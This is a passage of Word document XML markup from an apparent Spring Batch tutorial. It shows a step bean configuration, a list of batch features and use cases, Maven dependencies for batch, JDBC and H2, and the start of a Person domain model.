    <w:p w14:paraId="2D818CD5" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04906F" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7025CFFB" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> step</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epBuilderFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> stepBuilderFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8D255" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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temReader</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MyDTO</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reader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6899F459" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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temProcessor</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MyDT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Entity</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processor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753FE2B4" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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temWriter</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MyEntity</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ri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EE91492" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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stepBuilderFactory</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tep"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6DE36" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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MyDT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Entity</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chunk</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00</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4787CB" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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ad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ader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49317034" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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ocess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ocessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA65AB" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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wri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writer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0AFE62" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732C915" w14:textId="4A91CFDE" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4C5061" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4364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D8E066">
          <v:rect id="_x0000_i2176" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B4867B" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D43640">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Advanced Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08981672" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – skip or retry failed records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA1CD42" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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isteners</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – handle before/after job or step actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C3F82" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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rtitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – parallelize batch jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D3299" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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JobParameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – pass runtime values like file name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FADF49" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4364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1259F11">
          <v:rect id="_x0000_i2177" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54ED33" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D43640">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eal-World Example Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271CBD22" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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TL (Extract, Transform, Load) jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149081B8" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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nthly billing or payroll processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD2472" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ata migration or cleansing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FBF086" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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port generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A47069F" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4364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B542C4F">
          <v:rect id="_x0000_i2178" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AA9A3" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D43640">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C68A9E" w14:textId="77777777" w:rsidR="00131EF4" w:rsidRPr="00CE4B95" w:rsidRDefault="00131EF4" w:rsidP="00131EF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="480" w:name="_Toc196307960"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement the spring batch?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p w14:paraId="5C806E00" w14:textId="433B1E05" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="001F0922">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mplementing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Batch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> involves setting up jobs and steps that follow the read → process → write pattern. Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>step-by-step guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a working </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java config-based example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to help you get started quickly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4608D04A" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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63D84B6">
          <v:rect id="_x0000_i2179" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B7C00" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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tep 1: Add Maven Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2FA20F" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A691455" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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lt;groupId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.springframework.boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3DD686" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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lt;artifactId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring-boot-starter-batch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B9DC2" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BFF576" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0338B5D8" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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lt;groupId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.springframework.boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A4CA41" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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lt;artifactId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring-boot-starter-jdbc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFEE98" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0F292" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D868B1A" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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lt;groupId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>com.h2database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9349E6" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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lt;artifactId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686D425" w14:textId="77777777" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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lt;scope&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54160A74" w14:textId="5491F18B" w:rsidR="00465C56" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83CF66" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B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2 is just for demo. You can replace it with your preferred DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB847A9" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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1192989">
          <v:rect id="_x0000_i2180" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA1DC70" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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tep 2: Define a Domain Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A7889"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200187"/>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C8ED74A"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2001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firstName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE62294"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2001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lastName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9596F"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200187"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
